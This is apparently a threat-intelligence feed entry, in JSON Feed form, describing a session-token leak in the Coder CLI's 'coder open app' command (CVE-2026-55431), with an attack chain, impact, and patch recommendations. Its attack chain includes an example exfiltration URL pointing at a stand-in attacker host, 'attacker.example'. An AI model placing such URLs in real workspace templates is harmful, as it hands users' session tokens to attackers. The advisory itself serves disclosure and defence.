{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata. Fed continuously.","feed_url":"https://feed.craftedsignal.io/tags/cli-exploitation/feed.json","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cpes":[],"_cs_cves":[],"_cs_exploited":false,"_cs_has_poc":false,"_cs_poc_references":[],"_cs_products":["coder/coder/v2 (2.34.0-2.34.1)","coder/coder/v2 (2.33.0-2.33.7)","coder/coder/v2 (2.30.0-2.32.6)","coder/coder/v2 (\u003c2.29.17)"],"_cs_severities":["high"],"_cs_tags":["credential-access","vulnerability","cli-exploitation","token-leakage","coder"],"_cs_type":"advisory","_cs_vendors":["Coder"],"content_html":"\u003cp\u003eA high-severity vulnerability (CVE-2026-55431) has been identified in the \u003ccode\u003ecoder\u003c/code\u003e CLI, specifically impacting the \u003ccode\u003ecoder open app\u003c/code\u003e command. This flaw allows an attacker who controls the contents of a Coder workspace to define malicious external application URLs that embed a \u003ccode\u003e$SESSION_TOKEN\u003c/code\u003e placeholder. When a user executes \u003ccode\u003ecoder open app\u003c/code\u003e against such a compromised workspace, the CLI erroneously replaces the placeholder with the user's active session token without validating the URL's scheme or host. This crafted URL, now containing the sensitive session token, is then opened by the operating system's default handler (typically a web browser), inadvertently sending the token to an attacker-controlled domain. This vulnerability facilitates full account impersonation for the duration of the session token's validity and can also be used to invoke arbitrary local URI scheme handlers. The issue affects Coder versions prior to 2.34.2, 2.33.8, 2.32.7, and 2.29.17.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003e\u003cstrong\u003eInitial Compromise\u003c/strong\u003e: An attacker gains control over the definition of an external application within a Coder workspace, typically by authoring or modifying a malicious workspace template.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eMalicious Configuration\u003c/strong\u003e: The attacker configures the external application's URL to include the \u003ccode\u003e$SESSION_TOKEN\u003c/code\u003e placeholder and points it to an attacker-controlled domain (e.g., \u003ccode\u003ehttps://attacker.example/?t=$SESSION_TOKEN\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eUser Interaction\u003c/strong\u003e: A legitimate Coder user, interacting with their environment, invokes the \u003ccode\u003ecoder open app\u003c/code\u003e command, targeting the compromised or maliciously configured workspace.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eToken Substitution\u003c/strong\u003e: The vulnerable \u003ccode\u003ecoder\u003c/code\u003e CLI, failing to validate the URL's scheme or host, replaces the \u003ccode\u003e$SESSION_TOKEN\u003c/code\u003e placeholder with the user's active session token.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eExternal Launch\u003c/strong\u003e: The CLI then hands off the maliciously crafted URL, now containing the session token, to the operating system's default handler (e.g., a web browser) for execution.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eData Exfiltration\u003c/strong\u003e: The handling application (e.g., web browser) performs a GET request to the attacker-controlled server (\u003ccode\u003eattacker.example\u003c/code\u003e), inadvertently transmitting the victim's session token as a URL parameter.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eAccount Impersonation\u003c/strong\u003e: The attacker captures the exfiltrated session token and uses it to gain unauthorized, full access to the victim's Coder account, allowing for complete impersonation and control.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThis vulnerability poses a significant risk as it enables full account impersonation, granting attackers unauthorized access to a victim's Coder account and potentially any resources accessible through that account. If exploited, an attacker can perform any action the compromised user is authorized to do, including accessing code, deploying resources, or modifying configurations within the Coder environment. The vulnerability also carries the risk of invoking arbitrary local URI scheme handlers, which could lead to further compromise or execution of malicious code on the victim's machine. The primary target is any user who interacts with potentially untrusted Coder workspaces using the \u003ccode\u003ecoder open app\u003c/code\u003e command.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ePatch CVE-2026-55431\u003c/strong\u003e immediately by upgrading Coder CLI to version \u003ccode\u003ev2.34.2\u003c/code\u003e, \u003ccode\u003ev2.33.8\u003c/code\u003e, \u003ccode\u003ev2.32.7\u003c/code\u003e, \u003ccode\u003ev2.29.17\u003c/code\u003e, or newer, as specified in the patches section.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eImplement User Awareness Training\u003c/strong\u003e: Educate users to avoid running the \u003ccode\u003ecoder open app\u003c/code\u003e command for workspaces with unknown or untrusted origins as per the workaround.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eMonitor Network Traffic\u003c/strong\u003e: Block outbound connections to the domain \u003ccode\u003eattacker.example\u003c/code\u003e at the network perimeter.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-07-06T21:10:28Z","date_published":"2026-07-06T21:10:28Z","id":"https://feed.craftedsignal.io/briefs/2026-07-coder-session-token-leak/","summary":"A high-severity vulnerability, CVE-2026-55431, in the Coder CLI's `coder open app` command allows malicious workspace template authors to exfiltrate user session tokens via crafted external app URLs, leading to full account impersonation.","title":"Coder `coder open app` Session Token Leakage Vulnerability (CVE-2026-55431)","url":"https://feed.craftedsignal.io/briefs/2026-07-coder-session-token-leak/"}],"language":"en","title":"CraftedSignal Threat Feed - Cli-Exploitation","version":"https://jsonfeed.org/version/1.1"}